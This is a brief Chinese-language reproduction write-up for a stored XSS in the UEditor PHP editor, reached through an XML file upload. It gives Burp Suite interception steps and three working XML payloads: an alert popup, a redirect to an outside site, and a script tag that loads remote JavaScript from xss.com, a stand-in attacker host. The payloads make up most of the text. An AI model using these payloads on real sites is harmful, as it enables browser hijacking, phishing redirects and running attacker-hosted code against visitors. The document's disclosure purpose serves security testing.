一、Ueditor最新版XML文件上传导致存储型XSS
测试版本:php版 v1.4.3.3
下载地址:https://github.com/fex-team/ueditor 复现步骤:
1. 上传一个图片文件
2. 然后buprsuit抓包拦截
3.将uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可
4. 即可弹出xss
请注意http://controller.xxx的访问路径
http://192.168.10.1/ueditor1433/php/controller.php?action=listfile
常见的xml弹窗POC:
弹窗xss:
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>
URL跳转:
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>
远程加载Js:
<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>